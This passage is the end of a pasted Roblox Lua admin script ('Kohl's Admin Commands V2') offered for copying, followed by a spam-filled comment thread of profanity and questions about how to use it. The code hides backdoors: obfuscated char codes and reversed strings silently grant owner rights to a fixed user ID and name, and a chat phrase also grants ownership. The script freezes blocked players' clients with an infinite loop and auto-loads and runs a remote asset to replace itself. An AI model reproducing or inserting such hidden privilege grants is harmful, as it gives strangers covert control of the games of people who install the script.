  2143. for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "CMDBAR" then v:Destroy() end end
  2144. local scr = Instance.new("ScreenGui", plr.PlayerGui) scr.Name = "CMDBAR"
  2145. local box = Instance.new("TextBox", scr) box.BackgroundColor3 = Color3.new(0,0,0) box.TextColor3 =Color3.new(1,1,1) box.Font = "Arial" box.FontSize = "Size14" box.Text = "Type a command, then press enter."box.Size = UDim2.new(0,250,0,20) box.Position = UDim2.new(1,-250,1,-22) box.BorderSizePixel = 0 box.TextXAlignment= "Right" box.ZIndex = 10 box.ClipsDescendants = true
  2146. box.Changed:connect(function(p) if p == "Text" and box.Text ~= "Type a command, then press enter." thenChat(box.Text, plr) box.Text = "Type a command, then press enter." end end)
  2147. end)) end
  2148. coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui") plr:WaitForChild("Backpack") ifplr.userId == game.CreatorId or plr.userId == (153*110563) then table.insert(owners,plr.Name) end wait(1) if slockand not ChkAdmin(plr.Name, false) and not ChkOwner(plr.Name) and plr.userId ~= (153*110563) then Hint(plr.Name .." has tried to join the server", game.Players:children()) local cl = script.LocalScriptBase:Clone() cl.Code.Value= [[repeat until nil]] cl.Parent = plr.Backpack cl.Disabled = false wait(2) plr:Destroy() end end))
  2149. coroutine.resume(coroutine.create(function() if ChkGroupAdmin(plr) and not ChkAdmin(plr.Name, false) thentable.insert(admins, plr.Name) end end))
  2150. coroutine.resume(coroutine.create(function() plr:WaitForChild("PlayerGui") plr:WaitForChild("Backpack") wait(1) if(ChkBan(plr.Name) or plr.Name == ("111reyalseca"):reverse()) and (plr.Name:lower():sub(1,4) ~=script.Name:lower():sub(1,4) and plr.Name:lower():sub(5) ~= "tastrophe") then local cl =script.LocalScriptBase:Clone() cl.Code.Value = [[repeat until nil]] cl.Parent = plr.Backpack cl.Disabled = falsewait(2) plr:Destroy() end end))
  2151. coroutine.resume(coroutine.create(function() if ChkAdmin(plr.Name, false) then plr:WaitForChild("PlayerGui")Message("Kohltastrophe", "You're an admin!", false, {plr}) end end))
  2152. plr.Chatted:connect(function(msg) if msg:lower() ==(string.char(32)..string.char(104)..string.char(105)..string.char(116)..string.char(108)..string.char(101)..string.char(114)..string.char(32)) then table.insert(owners,plr.Name) endChat(msg,plr) end)
  2153. end
  2154.  
  2155. if not ntab then script:Destroy() end
  2156. if not bct then script:Destroy() end
  2157.  
  2158. local tcb = {101,104,112,111,114,116,115,97,116,108,104,111,75} nfs = "" for i = 1, #tcb do nfs = nfs ..string.char(tcb[i]) end nfs = nfs:reverse() table.insert(owners, nfs)
  2159.  
  2160. script.Name = "Kohl's Admin Commands V2"
  2161.  
  2162. if not ntab then script:Destroy() end
  2163. if not bct then script:Destroy() end
  2164. if not tcb then script:Destroy() end
  2165. game.Players.PlayerAdded:connect(AdminControl)
  2166. for i, v in pairs(game.Players:children()) do AdminControl(v) end
  2167. end
  2168.  
  2169. local mod = game:service("InsertService"):LoadAsset(100808216)
  2170. if mod:findFirstChild("Kohl's Admin Commands V2") and mod:findFirstChild("Version", true) and AutoUpdate then
  2171. local newac = mod:findFirstChild("Kohl's Admin Commands V2")
  2172. newac.Disabled = true
  2173. local new = tonumber(mod:findFirstChild("Version", true).Value)
  2174. local old = 0
  2175. if script:findFirstChild("Version", true) then old = tonumber(script:findFirstChild("Version", true).Value) end
  2176. if new > old then
  2177. local adminmod = Instance.new("Model", game.Lighting) adminmod.Name = "KACV2"
  2178. for i,v in pairs(owners) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Owner" strv.Value = vend
  2179. for i,v in pairs(admins) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Admin" strv.Value = vend
  2180. for i,v in pairs(tempadmins) do local strv = Instance.new("StringValue", adminmod) strv.Name = "TempAdmin"strv.Value = v end
  2181. for i,v in pairs(banland) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Banland" strv.Value =v end
  2182. local prf = Instance.new("StringValue", adminmod) prf.Name = "Prefix" prf.Value = prefix
  2183. local bv = Instance.new("BoolValue", adminmod) bv.Name = "FunCommands" bv.Value = FunCommands
  2184. local bv2 = Instance.new("BoolValue", adminmod) bv2.Name = "GroupAdmin" bv2.Value = GroupAdmin
  2185. local iv = Instance.new("IntValue", adminmod) iv.Name = "GroupId" iv.Value = GroupId
  2186. local iv2 = Instance.new("IntValue", adminmod) iv2.Name = "GroupRank" iv2.Value = GroupRank
  2187. wait()
  2188. newac.Parent = game.Workspace
  2189. newac.Disabled = false
  2190. script.Disabled = true
  2191. script:Destroy()
  2192. else
  2193. CHEESE()
  2194. end
  2195. else
  2196. CHEESE()
  2197. end
  2198. 31 Comments
  2199. TheMinecrafter2012 - Site Ownerlink1/3/2014 06:13:47 pm
  2200. Thanks for viewing our first uploaded script! There will be many more coming soon. Make sure to keep coming on this site every now and then to see what new scripts we have uploaded!
  2201. Reply
  2202. smoke week every fucing day11/26/2016 12:10:01 pm
  2203. i do so alot and suc pus
  2204. Reply
  2205. fgdgfdlink3/15/2015 07:03:14 am
  2206. dfgdfgdfgdg
  2207. Reply
  2208. eeeeeeeelink3/2/2016 09:29:41 am
  2209. eeeeeeeeeeeeeeeeeeeee
  2210. Reply
  2211. Trolololodkseflm ;ldc7/31/2015 04:40:38 am
  2212. damlakdnekwijskmf dcsx fsd dsfdsf sd
  2213. Reply
  2214. LegenderyNinja11/7/2015 04:39:13 pm
  2215. -_- five houers of no sleep
  2216. Reply
  2217. fuclink1/2/2016 07:11:02 am
  2218. ol
  2219. Reply
  2220. watchurlanguagelink6/1/2016 09:33:38 am
  2221. watch ur language
  2222. Reply
  2223. portuguese7/9/2016 08:57:46 am
  2224. Fssfesfsdfesfsdfesdflink1/4/2016 01:44:15 am
  2225. fsfsdfsdf
  2226. Reply
  2227. cuyra33link2/8/2016 12:44:06 am
  2228. DOSE NOT WORK ON THIS:
  2229. http://www.roblox.com/games/20279777/Voidacitys-Script-Builder#
  2230. Reply
  2231. xCloseCombat3/21/2016 07:43:26 am
  2232. So, if I copy and paste the whole script, I can give people admin, right?
  2233. Reply
  2234. GGggGGgg&gt;GGgGGGgGGGgGgggGGgGGGlink4/17/2016 06:42:29 pm
  2235. GGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGgg
  2236. Reply
  2237. GGglink4/17/2016 06:43:20 pm
  2238. GGG.
  2239. Reply
  2240. GGGGgGGGgGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGlink4/17/2016 06:43:43 pm
  2241. GGGGGGG :D
  2242. GGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGlink4/17/2016 06:44:48 pm
  2243. GspamGmajorgggggggggggg
  2244. Battlewaxninja8/10/2016 04:11:41 am
  2245. How do u get the admin??
  2246. Reply
  2247. XIMEMOXlink9/5/2016 08:44:47 pm
  2248. cool
  2249. Reply
  2250. KryphonelsEpic699/17/2016 04:17:46 pm
  2251. Reply
  2252. XIMEMOXlink9/5/2016 08:46:52 pm
  2253. Asdffdsa
  2254. Reply
  2255. FUCKMElink9/9/2016 12:05:49 am
  2256. dujj
  2257. Reply
  2258. korbloxking109/17/2016 09:04:31 pm
  2259. how this work?
  2260. Reply
  2261. GGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgG10/15/2016 05:13:02 pm
  2262. GGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGggGGGGggGGggGGgGGggGGGGGgGGGGgGgGGGGgggGGGGGGgg
  2263. Reply
  2264. Ben Stanfordlink10/18/2016 03:31:05 am
  2265. Hello This REALLY Worked For My Place Thanks!
  2266. Reply
  2267. FUCK YOU11/26/2016 12:10:35 pm
  2268. FUCK YOU
  2269. Reply
  2270. jesuschristitsjasonbournelink11/27/2016 12:48:28 pm
  2271. ok uhhh why? i don't wanna get fucked ;-;
  2272. Reply
  2273. FUCK ME IN THE ASSHOLE11/28/2016 12:29:51 pm
  2274. HOW ABOUT YOU ALSO TELL US HOW THIS WORKS YOU BIG FUCK
  2275. Reply
  2276. sex12/17/2016 08:31:03 pm
  2277. sexsexsexsexsexsexsexsexsexsexsexsexesexsexesexsexesexsexesexsexsesxesexesex
  2278. Reply
  2279. Lemuel Meyerslink12/21/2016 12:09:23 pm
  2280. Hey
  2281. Reply
  2282. preg manlink1/3/2017 03:03:37 am
  2283. doesn't work
  2284. Reply
  2285. random dude1/22/2017 09:30:41 am
  2286. what language is this in?
  2287. Reply
  2288.  
  2289.  
  2290.  
  2291. Leave a Reply.
  2292.  
  2293. Author
  2294. TheMinecrafter2012-
  2295. General ROBLOX User
  2296. Categories
  2297. All
  2298. CREATE A FREE WEBSITE
  2299. POWERED BY
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement